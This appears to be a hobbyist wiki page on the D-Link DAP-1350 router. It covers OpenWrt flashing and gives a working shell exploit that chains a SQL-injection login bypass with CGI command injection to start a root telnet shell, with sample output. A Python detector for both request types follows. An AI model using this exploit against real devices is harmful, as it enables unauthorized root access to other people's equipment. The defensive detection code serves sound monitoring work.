D-Link DAP-1350 rev A1

Links of Interest

 * D-Link DAP-1350 RT3052-based router... can I flash DD-WRT?
 * On the OpenWrt forums
 * Interface emulator

Flashing OpenWRT
OpenWRT trunk contains support for the DAP-1350; however, the 12.09-beta build is broken. You can build your own firmware from trunk now, or wait for the Attitude Adjustment release.

Enabling telnet
A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program. A second SQL injection vulnerability also exists in the login handler, which allows HTTP authentication to be bypassed.


#!/bin/ksh

# DAP-1350 telnetd, by brynet.
# This affects all stock firmware images for the device.
# Tested on OpenBSD.

host=$1

if [ $# -ne 1 ]; then echo "usage: $0 host or ip"; exit 1; fi

# Common request header; the query string value is a cache-busting nonce.
base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\
"Host: ${host}\r\nConnection: keep-alive\r\n"\
"Content-Type: application/x-www-form-urlencoded\r\n"

# The login form sends its fields as unpadded base64:
#   user_name=admin
#   user_pwd=';select 1;--
login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ"
login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n"
login_req="${base_req}${login_clen}${login_cmd}"

# A successful login response contains the string "default".
echo $login_req | nc $host 80 | grep default > /dev/null 2>&1
if [ $? -eq 0 ]; then echo "Authenticated."; else echo "Failed."; exit 1; fi

# Ask the CGI to start telnetd with /bin/sh as the login program.
telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh"
telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n"
telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}"

echo $telnetd_req | nc $host 80 > /dev/null 2>&1
sleep 2; nc -z $host 23 > /dev/null 2>&1
if [ $? -eq 0 ]; then echo "Root shell, okey doke."; telnet $host; else echo "No root.. sorry, heh."; exit 1; fi

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

$ ./exploit.sh dlinkap # 192.168.0.50
Authenticated.
Root shell, okey doke.
Trying 192.168.0.50...
Connected to dlinkap.
Escape character is '^]'.
... motd/etc.
#

The factory set root password is unknown, so no login(1) process is started.

You must run the exploit script each time the device is powered on.
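Both requests are easy to recognise on the wire, which matters because the stock firmware gives you no other way to notice them. The Python below is an added example (not from this page or its author) that decodes the unpadded base64 in the login form and flags the two request types in captured POST bodies to my_cgi.cgi; the sample bodies are constructed.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies to /my_cgi.cgi, as an inline proxy or a
# packet capture on the LAN side might record them (not traffic from the page).
SAMPLE_BODIES = [
    "request=login&user_name=YWRtaW4&user_pwd=cGFzc3dvcmQ",        # ordinary login
    "request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ",  # auth bypass
    "request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh",    # command execution
    "request=get_status",                                           # benign request
]

# Metacharacters and keywords that have no business in a decoded credential
# (a legitimate password containing a quote will be flagged too; tune as needed).
SQLI_PATTERN = re.compile(r"['\";]|--|/\*|\b(select|union|or)\b", re.IGNORECASE)


def b64_decode_unpadded(value):
    """Decode the unpadded base64 the stock login form sends; '' if not base64."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def classify_body(body):
    """Return the findings for one POST body to my_cgi.cgi (empty list if clean)."""
    params = parse_qs(body, keep_blank_values=True)  # also percent-decodes values
    request = params.get("request", [""])[0]
    findings = []
    if request == "login":
        for field in ("user_name", "user_pwd"):
            decoded = b64_decode_unpadded(params.get(field, [""])[0])
            if SQLI_PATTERN.search(decoded):
                findings.append("sqli:" + field)
    elif request == "admin_webtelnet":
        # Any use of this request is a command execution attempt on the device.
        findings.append("cmd_exec")
        if "telnetd" in params.get("cmd", [""])[0]:
            findings.append("telnetd_spawn")
    return findings


def scan(bodies):
    """Return (body, findings) for each body that raised at least one finding."""
    return [(b, f) for b in bodies if (f := classify_body(b))]
```

Running scan(SAMPLE_BODIES) flags the second and third bodies only.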

Pictures
D-Link Images